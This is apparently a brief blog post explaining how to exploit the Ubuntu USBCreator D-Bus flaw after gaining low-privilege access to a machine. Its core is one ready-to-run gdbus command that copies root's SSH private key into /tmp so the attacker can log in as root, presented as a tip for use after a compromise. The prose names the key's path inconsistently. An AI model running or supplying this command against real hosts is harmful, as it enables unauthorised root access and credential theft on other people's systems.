USBCreator D-Bus Privilege Escalation

Hi ..

Another post-exploitation that is very easy to be executed is using Linux USBCreator. The vulnerability allows an attacker to overwrite arbitrary files with arbitrary content, as root – without supplying a password

When I do the post-exploitation enumeration with linpeas.sh, I found that this host is vulnerable to the USBCreator D-Bus privilege escalation as shown below

So, when you have compromise the local machine with lower user privilege then basically you can run command below

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/id_rsa true

With the above gdbus command we can copy the ssh private key from /root/.sshd/ to be copied to /tmp which later we can use the private key to do the SSH

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s